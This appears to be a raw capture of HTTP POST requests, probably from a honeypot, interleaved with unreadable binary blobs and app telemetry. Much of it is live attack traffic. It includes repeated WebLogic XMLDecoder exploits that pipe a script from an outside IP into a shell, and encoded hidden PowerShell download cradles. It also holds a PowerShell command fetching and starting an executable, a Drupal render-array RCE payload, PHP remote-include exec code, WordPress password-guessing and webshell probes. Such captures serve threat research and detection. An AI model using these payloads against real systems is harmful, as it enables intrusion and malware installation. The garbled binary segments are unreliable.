†ôö¶ˇ1∏#ˇÆ/ÕLR{ù›jõÓâ2pRO§‹íëç3·Mó@|≈/&µÃ¶ô®'»á‹õÍÙ¿£ÁÁ~6»˝Ö˘´ƒI2/X]gQŸÖVÄ
3fluÚ˜^œÀ+ç¢~É<)d÷x‡Pˇ`xÇ8	`∫Ú:µ5ŸjêΩ	HCÍfiÏL∫–É?/˝b|É‚Äfi√=?i¯≈≠%0∆'æ#è˛»¸Âæ≠’ùUõ/⁄∆˚ì˛IA?Œlµ©¢S¬`ΩNü.p_ÚMuß⁄iı$„ª¸L›õi‡Y=ÁU∞n&˛ÅÎÜFü‰xõÜA>{í˝o[ㆋ=·v∑>πºKÉ™H]çf€u.”r—hÎfi„›¬fi˘øo¸x#i’~≠LiDÜ[#ê≤Úì‡√˝œ—1
÷MÕÖiÕ=;s:v¬≠
ö’
t£bçÆ
^W‘Ô’˘v'ƒ”c‡Ÿ«\4ù‡ πéø∑ŸÖ/†ßÜ‚Uµ∑ÂÆùà.BCgµõ$¢6∑C◊œa«^BK‚ÓÇÿ+À Ô®flI◊4ß+flQñbºXgôfl®2»?‘E=»|PK–E8¿bw≤óE*{	ä Ωèè$¨d~gè˙¶3⁄õß‹VêÅñYFÎ*çûG•M∫(É&∞Ñ“6Î∂Ì^õ—∂Ö⁄ö÷VÕ∂n∑±⁄fùv¡®›&Vm
∑ïXWª∆‚ò?jWÔ◊UìÔj}µéØî´ø=j˘flaœ
,æMKØ_·‚DÀ3.©7˶ôâü©ÙrÂ3÷V≠É2:Á»”0	+ÿπˇô8
ËjWn◊ÕŸ∑NA9ÛFo‡Ôƒ¨"b›@F)
‹ÀqÅ©Ä—¿`ÕÁX546é”Õ™yµÚ|æN^ÖÀ´˜ª∫Œ„´Aº?M”ÕëûgŸo·?#˜ÈTÔ‹âNflüÊ»∞(√ß⁄ Ér±É¡∑¥IaòeyöM√†XêΩ∆Ó/¡˜ˆûjUÅ{-°cÑ–Áœˇ
t˛@1d74cfd0ff8949300e9cc6e5adc3c2eb3c33458ab424c61829195ce0fe0d0500 ffa17f50a8f6d5aab75bd70e4b0e6ebb

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=172&pwd=141414

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache

log=admin&pwd=17212

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
:µÃ©Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl

POST /blog/xmlrpc.php HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check

<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>



POST /mail/include.html?default_lang=2&lang_settings[2]=;http://aumentesusventas.com/email? HTTP/1.1
Host: x.x.x.x:32000
Accept: */*
Content-Length: 330
Expect: 100-continue
Content-Type: multipart/form-data; boundary=----------------------------46dd4a03fbeb

------------------------------46dd4a03fbeb
Content-Disposition: form-data; name="data"

exec("echo %COMPUTERNAME%", $computer);
foreach($computer as $ligne) 
	print("System information for ".$ligne."\n");
exec("whoami", $out);
foreach($out as $ligne) 
	print($ligne."\n");

------------------------------46dd4a03fbeb--


POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive



POST http://t14.proxy-checks.com/favicon.ico HTTP/1.1
Host: t14.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:53.0) Gecko/20170101 Firefox/53.0
Host: drupal
Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail[#type]=markup&mail[#markup]=id


POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

axa=die((string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=admin&pwd=jamesatchueq

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache

RqwNw93KMfuengvXLJrTiGln6laCOu+mqsBGSh3pSCELpdN4TRYp/su5EcNJYNHGdsGrhc77J4xWV3DASxWMuhukEWGR5v9IXhI8dyzqgnF1uI5qTbD293Y3l3Xf+IOasv02iucklKfsk7GxDfDY25BOxOcQlgGpqutucW3PBxcAjj7FraPz9q5s7PxkkLCqKWRPS1DMhPTghyvhMb5IqVwoZyWYWzqDL4Z4bwWi5gBHwgn/bR79QxeUB5GQa8wN3vckpe0GY4SnJZ2jdMywRPJFcrS2S977t3yc5rUa0gDGlQpJQpnnsiEDzE2Vy5PpdSQ9lZ7vlvSZ/G891M5xgdfwweIsUOHO634t/fg4fPWHeb0Y6jdoMB21F7wd1tU4QPie5R+4

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache

R6xdx9/JMSk3viWaNgIzNwEpRe68Sgww7qnHKZhK+b5DjzyXOCEM/A4Zadrn9GCAXLGShmwW6viWZ07nqx/ucZZqMk7Gx+77IJSo4TkMuO8Kgn2umLzBs+UQdGPP/WY5Oxoml7uAtYuiKFJIbzoYRwDp4mfthWhZjctP3/uEOEq/r1PoGivkf8tOk08O5B/zfNzntsz1BZTOu1OtX1O9v46ZTbzEJCsvqqzGw/wSCRjU1+cbQDUAF79UI4prtB1W/HmedpOcGMn8zz5qEcjWaRB8QwWAVZGNb+qxF5gyrPSzvrlZ23Sxfi/D3H3IlxWiexi2ov7gOwOJOL/4hRNi3BV0aXmAIy29Ek08MHKdnftNqNUCSFPEnS//GoWxBd0Sr0pbsy8U0Ub5lPBWh0pcCkll4tnEi8ws1pyO5JK5

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∫ÍxÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îà„'Y›∆√«∆fl

POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=EVCoreProductMediation&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1495204770251&chk=f6cac54e HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream

1bf
ãΩï=ã1Ü˚¸äÈÉÇ,K˛Ç)Sí.˝é¸uw‹nvÊÚÔ„π6MÿcÇ;I6<ºØ^ü∑π›óÌ2(`h"LñìƒÈ3zƒ•›Oeõµfi€m{Y€ÌÙR˜öñykÎ∂ºÌ•g]ügÌ¡G©≈VkºóæÏ˝”≠≠oÁm˛u==]÷”Z_óÛıiº1w±U<àHVEPk*êzŒA5fïe˝˝~g6qπ\k;œ?æM¸˝Á◊˜∆ΩÕ¸eúOÁø(x"ì8$qSêƒ9fP°ÇB$2–òº…≈d€√√2Lí¡É)P:"ÖRXÄ;[à∂*tgµ4√ï>@1¥óÿ≠5c|l–(X‡¨B‘!≥	l≥ß\¶pìÒˇ≈Qÿ§u•∏ÔÖÊÊAŸF»ô	{	°©}ò¬ÔéItÙv8`cV"∞€Ö¨‡ã‘nc¯0EúåM6$6S0vü—8∏;äãEÁ°ÊÍ$÷Z=ûQÉbƒ¨OV¶ì2¸fl
}'`ä#i-d™°Ö`∫ˆˆä!&s¥£:ïR«á\ŸC~fiªm≈çò˙WG˝
O“·µˆ
0



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195



POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13

key=WVLP874WV

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ô¶F&Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¥Ò2Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache

FPBckNvJba2ibQwdo+ddPvC+pWM2Y7507OhNhApNnjdPncaBfQCpeT9qY88NkHrVaVwGlCMY2j7BZtJnneoijoEsUJUdwHLb1p9LW2irbCwGCdXRljqEDwERImMIz/9bpvQPuafYylB8dTVIxpM3b6MPn6tU+ryq3/8+qlKfDInW3JL7ry4f8Uz6uwhI4dmpXnf2plYp5Mol3AEMFrCUCwEk1G5zUSt5IL7Pg2NvB6rV9fBDF3Q1laiD28XZ2xSZkkdarSNLX06kRFOAkwDyroZzjnuPg3cLKF6wwmKTqbD+pfwbsRUzVk/59HsFKaIK7Pk4c1l1lFMdRb9Bfgti2ZblKe3zEkyVHAh3d3RB1EtC8A81a//efnbPzVC6

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die((string)(111111111*9));

POST //wls-wsat/CoordinatorPortType HTTP/1.1
Content-Type: text/xml
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
Host: x.x.x.x:7001
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 726

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
                <void class="java.lang.Thread" method="currentThread">
                    <void method="getCurrentWork">
                        <void method="getResponse">
                            <void method="getWriter"><void method="write"><string>xmldecoder_vul_test</string></void></void>
                        </void>
                    </void>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1037
Content-Type: multipart/form-data; boundary=wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

501226
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

db37450440085bdb3b684cae749a4e5c
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--wFtbJQIOJmfUFTaEEuQw6Kk27oUI_FDQs--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/RegistrationPortTypeRPC11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

3f9
9â
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\_QT>WVRZce
B>\L0fM%&_A5VHZqjNYXf{|L[Il}GUQ[by`^ZVLepYNHmkNS2BW^Tm+	QoxaQXHk|GTSZ6y
rTDTC8qFSc,hE]A8|GXnx5AQQZ dNHmxrRDTRHm|EY[Ybe
B>\L0f
;,S>@
s/28][3O
> H{k]jT^MZ.jO]R_epeRXQNe|BX[R{kKj_Zd,B^]apI5ES_TMk.^VS3z
eDBCrWZ[Z3ygP^Qj)\
^4~3\VH;-BNF,kGjTBCrDTOH''
rG	O4.	9*MF5J5!
	M< ZFrDCBopC\UFu:
aS\XJl}EXUZaqiPBCrWU`-LPiR
Tn,AXRnyLQ2QU>xENOH'khWH>Xe,
fPWXHi*PSn{WrYJCr@@AusgWXQHqjAPu*G_~E
4,[3 FUrDCBjpC]WFu:
aS\XJl}EXUZaqd^BCrWUW1pLb@QXXj-YR_bNSb_
RJn}ANOH'k2[M>*E^gpKh[@eyC\X2*rYJCrE@Ausb^^R@qjAPu*G_~C	
8f8 L7ILMZ(jO_W^ay#\_PMoqG]VZchQVQ@qjNYHn}JTi@Q\Okq[bxfB\TA9{G_V^ue
BrDV<{ATQ[b/VePXi+TUZ1}b_LT&jNY[de
DrWWMZ-&WVA	8$U?K
V<&3gXS"P8<AFu<
`DCBly@^ZXf|fPVUNdC@A	us
dFWOo,BZZ`,IaSXo
340
}LPXd||L[Zj-^W	o,NaYX<,B^W2|5F^^5YAusrRDTTNnyFTVY{kX\rD
s.8&C<MCT=WVQSoe
ArW_TJdzDYS^ay
